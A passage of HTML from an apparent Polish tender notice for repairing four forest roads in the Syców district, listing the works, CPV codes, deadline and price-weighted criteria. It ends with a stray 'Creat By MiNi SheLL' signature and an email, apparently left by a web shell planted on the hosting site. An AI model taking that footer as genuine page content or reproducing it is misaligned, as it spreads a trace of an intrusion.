	Zamawiający zastrzega sobie prawo zmiany  ilości  zlecanych robót. Realizacja będzie uzależniona od stanu nawierzchni dróg i warunków atmosferycznych oraz możliwości finansowych Zamawiającego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin przystąpienia do realizacji robót - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont czterech dróg w obrębie leśnym Syców o nr inwentarzowych 220/1203, 220/1276, 220/1295, 220/1296  w leśnictwach: Bukowina, Wioska, Drołtowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres przedmiotu zamówienia dla zadania - Pakietu 1-2 obejmuje następujące roboty:
1.1 Naprawie  (1m2) nawierzchni gruntowych 
1.2 Naprawie (1m2) nawierzchni z kamienia o  gr. 10 cm,
1.3. Uzupełnieniu kamieniem łamanym (1m3)  ubytków w nawierzchni kamiennej i gruntowej,
1.4. Wykonaniu (1mb) przepustu  z rur betonowych o średnicy 50 cm. wraz z niezbędnymi robotami  ziemnymi,
1.5. Wykonanie 1 komplet  (2 szt.) ścianek czołowych betonowych dla przepustu o średnicy 50 cm,
1.6. Oczyszczanie (1 mb) rowu z namułu o grubości  do 20 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 0,6 m,
1.7. Oczyszczanie (1 mb) rowu z namułu o grubości  do 40 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 0,6 m,
1.8. Oczyszczanie (1 mb) rowu z namułu o grubości  do 20 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 1 m,
1.9. Oczyszczanie (1 mb) rowu z namułu o grubości  do 40 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 1 m.
6)	Zamawiający zastrzega sobie prawo zmiany  ilości  zlecanych robót. Realizacja będzie uzależniona od stanu nawierzchni dróg i warunków atmosferycznych oraz możliwości finansowych Zamawiającego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin przystąpienia do realizacji robót - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com